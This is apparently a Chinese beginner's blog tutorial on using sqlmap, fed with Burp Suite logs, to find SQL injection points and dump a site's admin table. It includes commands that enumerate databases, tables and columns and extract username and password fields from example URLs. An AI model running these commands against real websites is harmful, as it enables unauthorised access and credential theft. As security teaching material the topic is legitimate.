最近学长让用sqlmap获取一个网站的管理员账户和密码，一开始就很迷茫啊，毕竟对这些东西不是太了解，，可能是我懂得太少，，后来完成之后才发现是一件很简单的事，毕竟，学长给的是一个容易攻破的网站，，也不算是攻破，总之就是入门嘛。

SQL注入：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

首先sqlmap据说是一个开源的，很强大的，集检测和利用注入点于一身的工具，有python语言开发，用之前得装python环境。说是有检测功能但是并不能直接扫描网站找到注入点，但是可以批量导入，就是省了你的麻烦。但是说一体化好像牵强了一点。

至于批量导入这里借用一个大佬的方法，就是借用burpsuite的日志文件批量导入，

配置burpsuite下记录所有的request记录，并保存在指定文件夹，指定在sqlmap的目录下，然后python sqlmap.py -l 文件名 --batch -smart

sqlmap就能批量导入burp的log文件了--batch指默认都选yes，，-smart指启发式快速判断，节约时间。

最后能注入的url会保存到out文件夹下

注意：log文件中如果有sqlmap无法读取的字符（ascii码之外的字符）会读取失败。

找注入点的工具还是啊d名小子啥的比较方便，而且这些工具才真是一体化，感觉比sqlmap简单的多。

而手工找注入点，，，主要是根据返回值的不同，这里就不说了，有个工具多好（所以说有些人感觉很厉害，可能是人家工具到位，并不一定是技术很强，大佬，请自动忽略）

既然找到注入点了，一般就不用测试了，但是还是列一下

 sqlmap -u "http://192.168.1.150/products.asp?id=134"  

因为我这是linux系统所以直接调用，windows：

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

一般会扫描出数据库管理器的类型和操作系统啥的

接下来我就按linux来了。。

列出数据库

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

有时候可能会提示不成功，我学长给我的直接没有数据库，因为acc只有表，，，这就很尴尬，，

就是说没有数据库，试试只用--tables即列出表名

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11  --tables

如果有数据库的话 加-D 数据库名

列表名有时候也不会成功，它会提示你是否用常规方法啥的，输y就对了，他用的方法好像是试错法，，具体你一试就知道了。

接着就是列字段，和列出指定字段了

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin --column

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin -C username，password --dump

导出后密码一般都不是明文，MD5啥的加密。。完事

至于后来用御剑啥的扫描登陆啥的就简单了

sqlmap命令补充：

参数：

--current-db列出当前使用数据库

--current-user当前用户

--user 列出所有用户

--password列出密码

PS：批量导入大佬的原文https://www.cnblogs.com/qmfsun/p/5654192.html

获取网站管理员账户密码？相关推荐

1. 给网站管理员的建议：创建可利用的、可抓取的网站

   转载自 谷歌中文网站管理员博客 发表者 T.V. Raman,研究学者 原文: Webmaster tips for creating accessible, crawlable sites 发表于: ...

2. 面向Web开发人员和网站管理员的Web缓存指南

   这是一篇知识性的文档,主要目的是为了让Web缓存相关概念更容易被开发者理解并应用于实际的应用环境中.为了简要起见,某些实现方面的细节被简化或省略了.如果你更关心细节实现则完全不必耐心看完本文,后面参考 ...

3. 获取网站后台权限理解

   文章目录 一.后台常见位置查找 1.1 猜解常用路径 1.2 robots.txt 1.3 访问报错页面 1.4 查看图片相关属性 1.5 CMS指纹识别 1.6 利用谷歌黑语法来查找 二.利用工具查 ...

4. alexa api php,PHP通过Alexa官方API获取网站Alexa排名 - 米扑博客

   Alexa 接口 Alexa的XML API接口是:http://data.alexa.com/data?cli=10&url=YOUR_DOMAIN_URL 查询结果如下: 如果想获取更多的 ...

5. seo同义词替换在线工具_8个免费的网站管理员在线SEO工具

   seo同义词替换在线工具 There are some great tools available to help webmasters with their SEO. Unfortunately, ...

6. WEB自动化（5）获取网站验证码即从验证码截图中获取图片中的字符串

   WEB自动化(1)环境安装及打开浏览器实例 WEB自动化(2)常用的元素定位方法之xpath详解 WEB自动化(3)PO设计模式原理与实现 WEB自动化(4)使用selenium将网站验证码截图保存为 ...

7. 植入木马获取网站权限

   获取网站权限 首先获得需操作网址(下面演示的是学校练习靶机) 打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理 随机寻找可注入点,找到注入点根目录位置 如图,这个就是随机找到的可植入木马位置 ...

8. 怎样获取网站的域名_搭建一个网站，通常的6大步骤你知道吗？

   怎样建网站?要搭建一个网站,通常有6个步骤.下面我们简单的介绍如何一步一步搭建网站. 第一步:注册域名 挑选网站地址,注册专属域名.注册域名的价格取决于具体用什么样的后缀域名搭建网站.目前可以选择的域 ...

9. curl用法：获取网站的header头及状态码

   curl命令最常用的方法是使用参数-I 获取域名或IP的header信息,包括HTTP返回状态码,server类型,文本类型,缓存时间等等:监控web服务时也常用此方法判断web服务是否正常: 监控w ...

最新文章

1. SAP PI 集成引擎
2. 使用java9的uuid生成方式，让uuid生成速度提升一个档次...
3. 在WinRT中读取资源文件
4. netcore更新dll要停止_使 .NET Core 应用程序容器化
5. 2016年第6本：简约至上--交互式设计四策略
6. flask找不到css_Flask干货：访问数据库——Flask-SQLAlchemy初始化
7. 《Java和Android开发学习指南（第2版）》——第2章，第2.10节本章小结
8. 很多人在销售过程中，喜欢考虑用一些话术
9. 《图像语义分析》学习笔记 （二）
10. Java设计模式-代理模式
11. VAssistX 常用快捷键 （常用好用）
12. tenda无线网卡Linux驱动,Ubuntu 10.04上腾达W541U V2.0 无线网卡驱动的使用
13. 霍尔编码器和电机驱动L298N
14. 常见文件文件头文件尾格式总结及各类文件头
15. 大数据技术架构_大数据架构流程图
16. ImageNet数据集 下载
17. neo4j图数据库--Cypher入门
18. 人工智能技术中的科学性与艺术性
19. 客户说：在忙，回头联系你。如何话术应对呢？
20. java找不到或无法加载主类

热门文章

1. Java数据库连接（JDBC）之连接失败问题汇总
2. 兴趣部落打通微信公众号，两大平台联手优化兴趣社交体验
3. APM飞控学习之路：2 四旋翼的工作原理与系统组成
4. 服务器跑网站用nigx还是apache,Apache和IIS及nginx三大web服务器，新手站长该如何选择？...
5. linux cp -b,Linux命令学习之Linux cp命令
6. 深入浅出JMS(一)–JMS基本概念(转载)
7. html span标签详解
8. 用html4绘制海豚,小海豚怎么画？六步教你画一只可爱的海豚
9. pycharm html 注释
10. 复位测试激励verilog HDL实例（写法3）